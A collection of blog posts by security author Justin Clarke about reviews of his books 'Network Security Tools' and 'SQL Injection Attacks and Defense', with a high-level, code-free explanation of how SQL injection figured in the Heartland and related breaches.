justinclarke.com

I asked Jose Nazario to do a review of the book written by Nitesh Dhanjani, myself, and a few of the people I used to work with in New York. He has submitted a (pretty positive) review on Amazon. You can see it here.

I was just ego searching on Google for references to the book Nitesh and I wrote (Network Security Tools). I found a few new reviews indexed by Google - including one in the IEEE Cipher Newsletter, Dave King's TheSecure.net blog, and we may even be (according to the Google indexed course proposal) required reading at a Network Security course at the University of Colorado at Boulder. It's always nice to know as an author that someone actually does read your book :-)

Quick announcement - looks like I'll have another forthcoming book coming out early next year - I have the contract from Syngress sitting on my dressing table right now.

More details to come (like what the book is on, who's involved in the project etc) will be forthcoming early next month as I have to get the full book outline completed first. What I will tell you all is it's a single topic book, is going to be very technical, and I have some great contributing authors lined up for it :-)

I now realise that I last posted on the topic of a forthcoming book in October last year. Well, the book has now gone to production and should be hitting the shelves in May of 2009. For those of you who haven't been denial-of-serviced with my LinkedIn status updates on the progress of the book, its called "SQL Injection Attacks and Defense", from Syngress.

I'm very happy with the great team of folks I managed to pull together for the book. The author list is as follows (in alphabetical order):

• Justin Clarke - i.e. me
• Dave Hartley - author of Bobcat
• Joe Hemler - colleague and fellow contributing author to Network Security Tools
• Alexander Kornbrust - CEO of Red Database Security and Oracle security guru with hundreds of Oracle bugs to his name
• Rodrigo Marcos - author of TAOF
• Haroon Meer - Technical Director at Sensepost, and well known speaker and researcher
• Gary Oleary-Steele - author of Automagic SQL Injector
• Alberto Revelli - author of sqlninja
• Marco Slaviero - primary author of Squeeza
• Dafydd Stuttard - AKA Portswigger, author of Burp Suite and the Web Application Hackers Handbook

Hopefully we'll be able to see the proofs in the next couple of weeks, and see what the production folks have done with the 520-odd pages of code-heavy goodness we sent them :-)

This is a repost from the original on the GDS Security Blog

Having recently seen our book SQL Injection Attacks and Defense come out, it is very timely indeed to see in the news of the recent indictment of Albert Gonzalez that SQL Injection played a key part in the Heartland Payment Systems, 7-Eleven, and Hannaford Brothers breaches, as well as for two other unnamed victim companies.

So how can SQL Injection, which is an application level problem, be used as a vector for attacking an organization? In a number of ways. SQL Injection gives an attacker the ability to interact with the database, and therefore if something is possible on the database server it may well be possible through SQL Injection. Modern database systems such as Oracle, SQL Server and others provide a rich variety of functionality for their users - all too often though, some of this functionality can be abused by malicious individuals.

Making some assumptions, its likely that something like the following occurred:

1. It was possible to interact with the underlying operating system in some way using SQL Injection. This could have been through the ability to execute operating system commands (such as through the well known xp cmdshell stored procedure on Microsoft SQL Server), or through the ability to stage content to the database server (or filesystem) and then have it compiled to executable content.
2. With the ability to execute content at the operating system layer, access was consolidated by providing some form of alternative control channel or remote access to the database server.
3. With consolidated access to the database server, the attacker uses the database server as a foothold to go further into the organization.

These types of hybrid attacks where one type of attack is dovetailed or launched over another are becoming increasingly common. Another SQL Injection hybrid attack of recent note was the SQL Injection mass attacks that started in early 2008. These used SQL Injection in another way - to inject links to JavaScript malware into thousands of unsuspecting vulnerable sites. It just goes to prove that even if a vulnerability is over 10 years old, it still has some new tricks to be seen.

Just noticed a very complimentary review of SQL Injection Attack and Defense at Help Net Security this morning. Will have to remember to pass a link to this onto the author team :-)

On a related note, I met Mirko from Help Net Security at BruCon in Brussels, but didn't manage to get an interview sorted out. There is a link to a previous email interview we did from the book review above...

A couple of good reviews of SQL Injection Attacks and Defense have been posted to Amazon recently (both 5 stars). Firstly we have a review from Chris Gates which gives a good balanced review of the book and points out some things he'd have liked to see. I agree with all of the points, and if we ever get a chance to do a second edition, we can add those on the todo list.

Second and most recent was a review from Richard Bejtlich who was also very positive about the book and mentioned it may be in the running for his "best book of 2009"!.